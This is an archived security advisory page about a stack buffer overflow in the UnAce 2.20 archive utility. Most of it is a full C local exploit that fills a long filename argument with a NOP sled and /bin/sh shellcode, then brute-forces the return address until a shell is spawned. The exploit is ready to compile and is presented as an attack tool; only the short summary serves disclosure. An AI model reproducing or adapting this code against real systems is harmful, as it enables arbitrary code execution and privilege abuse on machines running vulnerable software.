Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps N-Z :: bt1728.txt

UnAce 2.20 Exploitable Stack-Based Overflow







 UnAce 2.20 Exploitable Stack-Based Overflow 

 --------------------------------------------------------------------





 SUMMARY



UnAce has been reported to be prone to a buffer overflow vulnerability.

The issue presents itself when UnAce handles ace filenames that are

of excessive lenght. When this filename is passed to the UnAce utility

as an argument, the string is copied into a reserved buffer in memory.

Data that exceeds the size of the reserved buffer will overflow its bounds

and will trample any saved data that is adjacent to the affected buffer.

Ultimately this may lead to the execution of arbitrary instructions in

the context of the user who is running UnAce. For further informations,

please read the related advisory here [1].





 DETAILS



 Vulnerable systems:

 * UnAce v2.20 (current version)





 EXPLOIT





/*Local exploit for unace v2.2 by Li0n7

 *Bug reported by Andreas Constantinides <megahz@megahz.org>

 *contact me: Li0n7@voila.fr

 *visit us: ioc.fr.st

 *tested on slackware 9.0

 *usage: ./unace-exp[-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]

 *-r <RET>: try to exploit unace with specified <RET> as return address

 *-b:       enables bruteforcing

 *-s:       specify the first address to bruteforce

 *-d:       the value to take away from the starting address at each bruteforcing iteration     

 */





#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <sys/wait.h>

#include <sys/types.h>

#include <errno.h>



#define BSIZE   600

#define SIZE    BSIZE*2

#define D_DIFF  1

#define D_START 0xbfffffff

#define PATH    "/tmp/test/exploits/src/unace"

#define RET     0xbffff73a



char shellcode[]=

      "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"

      "\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";



char *buffer,*ptr;



void exec_culn();

int tease();

int make_string(long ret_addr);

int bruteforce(long start,int diff);

void banner(char *argv0);



int 

main(int argc,char *argv[])

{

      char * option_list = "bd:r:s:";

      int option,brute = 0,opterr = 0,diff = D_DIFF;

      long ret,start = D_START;



      banner(argv[0]);

      if (argc < 1) exit(-1);



      while((option = getopt(argc,argv,option_list)) != -1)

          switch(option)

          {

              case 'b':

                  brute = 1;

                  break;

              case 'd':

                  diff = atoi(optarg);

                  break;

              case 'r':

                  ret = strtoul(optarg,NULL,0);

                  make_string(ret);

                  tease();

                  exit(0);

                  break;

              case 's':

                  start = strtoul(optarg,NULL,0);

                  break;

              case '?':

                  fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);

                  banner(argv[0]);

                  exit(-1);

          }

 

      if(brute == 1)

          bruteforce(start,diff);



      return 0;

}



void 

exec_vuln()

{

      execl(PATH,PATH,"e",buffer,NULL);

}





int 

tease()

{

      pid_t pid;

      pid_t wpid;

      int status;



      pid = fork();



      if ( pid == -1 ) {

          fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));

          exit(13);



      } else if ( pid == 0 ) {



          exec_vuln();



      } else  {



         wpid = wait(&status);

         if ( wpid == -1 ) {



             fprintf(stderr,"[-] %s: wait()\n", strerror(errno));

             return 1;



         } else if ( wpid != pid )



             abort();



        else {



            if ( WIFEXITED(status) ) {



                printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));

                return WEXITSTATUS(status);



            } else if ( WIFSIGNALED(status) ) {



                return WTERMSIG(status);

            } else {



                fprintf(stderr, "[-] Stopped.\n");



            }

        }

      }

      return 1;

}





int 

make_string(long ret_addr)

{

      int i;

      long ret,addr,*addr_ptr;    

      

      buffer = (char *)malloc(SIZE);



      if(!buffer)

      {

          fprintf(stderr,"[-] Can't allocate memory, exiting...\n");

          exit(-1);

      }



      ptr = buffer;



      memset(ptr,0x90,BSIZE-strlen(shellcode));

      ptr += BSIZE-strlen(shellcode);



      for(i=0;i<strlen(shellcode);i++)

          *ptr++ = shellcode[i];



      addr_ptr = (long *)ptr;

      for(i=0;i<100;i++)

          *(addr_ptr++) = ret_addr;

      ptr = (char *)addr_ptr;

      *ptr = 0;



      return 0;

}





int 

bruteforce(long start,int diff)

{

      int ret;

      long i;



      fprintf(stdout,"[+] Starting bruteforcing...\n");

 

      for(i=start;i<0;i=i-diff) 

      {

          fprintf(stdout,"[+] Testing 0x%x...\n",i);

          make_string(i);

          ret=tease();

          if(ret==0)

          {

              fprintf(stdout,"[+] Ret address found: 0x%x\n",i);

              break;

          }

      }

      

      return 0;

}



void 

banner(char *argv0)

{

      fprintf(stderr,"\n    local exploit for unace v <= 2.2 by Li0n7\n");

      fprintf(stderr,"    vulnerability reported by Andreas Constantinides <megahz@megahz.org>\n");

      fprintf(stderr,"    visit us: http://www.ioc.fr.st\n");

      fprintf(stderr,"    contact me: Li0n7[at]voila[dot]fr\n");

      fprintf(stderr,"    usage: %s [-r <RET>][-b [-s <STARTING_RET>][-d <DIFF>]]\n\n",argv0);

}







 CREDITS



 Vulnerability reported by Andreas Constantinides <megahz@megahz.org>



 

REFERENCES



[1] http://www.securityfocus.com/archive/1/344065



 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH